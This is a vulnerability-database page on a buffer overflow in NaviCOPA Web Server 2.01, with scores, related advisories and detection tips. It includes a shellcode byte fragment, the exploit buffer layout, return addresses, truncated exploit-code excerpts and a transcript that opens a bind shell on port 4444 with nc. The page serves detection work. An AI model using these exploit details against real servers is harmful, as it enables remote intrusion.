CVE-2006-5112
published 2006-10-03CVE-2006-5112: Buffer overflow in InterVations NaviCOPA Web Server 2.01 allows remote attackers to execute arbitrary code via a long HTTP GET request.
PriorityP262high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
66.83%
99.2th percentile
Buffer overflow in InterVations NaviCOPA Web Server 2.01 allows remote attackers to execute arbitrary code via a long HTTP GET request.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| intervations | navicopa_web_server | — | — |
| intervations | navicopa_web_server | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\x6a\x50\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x91\xba\x06\x13\x83\xeb\xfc\xe2\xf4
- →Detect exploit attempts by matching HTTP GET requests with oversized URL parameters (~228+ bytes) sent to port 80 against NaviCOPA 2.0.1 servers; the buffer overflow triggers at 228–234 bytes of URL path data. ↗
- →Fingerprint vulnerable NaviCOPA 2.0.1 servers by checking HTTP banner responses containing the string '2.01 11th September'. ↗
- →The exploit payload bad characters for NaviCOPA GET overflow are: 0x00, 0x3a, 0x26, 0x3f, 0x25, 0x23, 0x20, 0x0a, 0x0d, 0x2f, 0x2b, 0x0b, 0x5c — these can help tune IDS rules to avoid false negatives. ↗
- →The exploit uses a return address in IV320009.dll (NaviCOPA component DLL); presence of this DLL loaded in a web server process combined with anomalous GET requests is a strong indicator of exploitation. ↗
- →Post-exploitation, the bind shellcode in the public PoC opens a shell on port 4444; monitor for unexpected inbound connections on TCP/4444 from NaviCOPA server hosts. ↗
- →The exploit buffer structure is: 'GET ' + ('A' * 230) + RET + (NOP * 32) + shellcode + ' HTTP/1.1\r\n\r\n'; use this pattern for Snort/Suricata content matching on oversized GET URI with NOP sled. ↗
- ·The Metasploit module targets NaviCOPA 2.0.1 specifically; the return address 0x1009b4ff is hardcoded for IV320009.dll and will not work against other versions or patched builds. ↗
- ·CVE-2006-5112 is noted as probably a different issue from CVE-2007-2336 and CVE-2007-1733; detection rules should not conflate these three NaviCOPA vulnerabilities. ↗
- ·The older Metasploit (Perl) module uses a slightly different offset (227–228 bytes) and a different return address (0x1002c46f, push esp/ret in IV320009.dll) compared to the newer Ruby module (0x1009b4ff); both target the same vulnerability but may require different detection thresholds. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-xwx8-pcpq-9jrq: Buffer overflow in InterVations NaviCOPA HTTP Server 2
ghsa_unreviewed·2022-05-01·CVSS 7.5
CVE-2007-1733 [HIGH] GHSA-xwx8-pcpq-9jrq: Buffer overflow in InterVations NaviCOPA HTTP Server 2
Buffer overflow in InterVations NaviCOPA HTTP Server 2.01 allows remote attackers to execute arbitrary code via a long (1) /cgi-bin/ or (2) /cgi/ pathname in an HTTP GET request, probably a different issue than CVE-2006-5112.
GHSA
GHSA-g7h8-fmq9-8m32: Buffer overflow in InterVations NaviCOPA Web Server 2
ghsa_unreviewed·2022-05-01
CVE-2006-5112 [HIGH] GHSA-g7h8-fmq9-8m32: Buffer overflow in InterVations NaviCOPA Web Server 2
Buffer overflow in InterVations NaviCOPA Web Server 2.01 allows remote attackers to execute arbitrary code via a long HTTP GET request.
GHSA
GHSA-hxx6-rmq4-pmj6: Unspecified vulnerability in InterVations NaviCOPA Web Server 2
ghsa_unreviewed·2022-05-01·CVSS 7.5
CVE-2007-2336 [HIGH] GHSA-hxx6-rmq4-pmj6: Unspecified vulnerability in InterVations NaviCOPA Web Server 2
Unspecified vulnerability in InterVations NaviCOPA Web Server 2.01 20070323 allows remote attackers to cause a denial of service (daemon crash) via crafted HTTP requests, as demonstrated by long requests containing '\A' characters, probably a different issue than CVE-2006-5112 and CVE-2007-1733. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
No detection rules found.
Exploit-DB
NaviCOPA Web Server 2.0.1 - URL Handling Buffer Overflow (Metasploit)
exploitdb·2010-07-12
CVE-2006-5112 NaviCOPA Web Server 2.0.1 - URL Handling Buffer Overflow (Metasploit)
NaviCOPA Web Server 2.0.1 - URL Handling Buffer Overflow (Metasploit)
---
##
# $Id: navicopa_get_overflow.rb 9797 2010-07-12 23:25:31Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 [ /InterVations/ ] }
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'NaviCOPA 2.0.1 URL Handling Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in NaviCOPA 2.0.1.
The vulnerability is caused due to a boundary error within the
handling of URL parameters.
},
'Author' => '
Exploit-DB
NaviCOPA Web Server 2.01 - 'GET' Remote Buffer Overflow (Metasploit)
exploitdb·2007-01-07
CVE-2006-5112 NaviCOPA Web Server 2.01 - 'GET' Remote Buffer Overflow (Metasploit)
NaviCOPA Web Server 2.01 - 'GET' Remote Buffer Overflow (Metasploit)
---
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::navicopa_get_overflow;
use base "Msf::Exploit";
use strict;
use Pex::Text;
my $advanced = { };
my $info =
{
'Name' => 'Navicopa 2.01 Buffer Overflow',
'Version' => '$Revision: 0.1 $',
'Authors' => [ 'Jacopo Cervini ', ],
'Arch' => [ 'x86' ],
'OS' => [ 'win32' ],
'Priv' => 1,
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
Exploit-DB
NaviCOPA Web Server 2.01 - 'GET' Remote Buffer Overflow
exploitdb·2006-09-27
CVE-2006-5112 NaviCOPA Web Server 2.01 - 'GET' Remote Buffer Overflow
NaviCOPA Web Server 2.01 - 'GET' Remote Buffer Overflow
---
/*
navi_exp.c
NaviCOPA Web Server 2.01 0day Remote Buffer Overflow Exploit
Coded by h07
Tested on XP SP2 Polish, 2000 SP4 Polish
Example:
C:\>navi_exp 192.168.0.1 0
[*] NaviCOPA Web Server 2.01 0day Remote Buffer Overflow Exploit
[*] Coded by h07
[+] Sending buffer: OK
[*] Check your shell on 192.168.0.1:4444
[*] Press enter to quit
C:\>nc -v 192.168.0.1 4444
[192.168.0.1] 4444 (?) open
Microsoft Windows XP [Wersja 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\windows\system32>
*/
#include
#define PORT 80
#define BUFF_SIZE 1024
typedef struct
{
char os_name[32];
unsigned long ret;
} target;
char shellcode[] =
/*
Win32_bind shellcode
Encoder: PexFnstenvMov
Bad chars: 0x00 0x20 0x0a 0x0d 0x2f 0x3f
Thx metasploit.c
Metasploit
NaviCOPA 2.0.1 URL Handling Buffer Overflow
metasploit
NaviCOPA 2.0.1 URL Handling Buffer Overflow
NaviCOPA 2.0.1 URL Handling Buffer Overflow
This module exploits a stack buffer overflow in NaviCOPA 2.0.1. The vulnerability is caused due to a boundary error within the handling of URL parameters.
No writeups or analysis indexed.
http://secunia.com/advisories/22124http://www.kb.cert.org/vuls/id/693992http://www.securityfocus.com/bid/20250http://www.vupen.com/english/advisories/2006/3819https://exchange.xforce.ibmcloud.com/vulnerabilities/29221https://www.exploit-db.com/exploits/2445http://secunia.com/advisories/22124http://www.kb.cert.org/vuls/id/693992http://www.securityfocus.com/bid/20250http://www.vupen.com/english/advisories/2006/3819https://exchange.xforce.ibmcloud.com/vulnerabilities/29221https://www.exploit-db.com/exploits/2445
2006-10-03
Published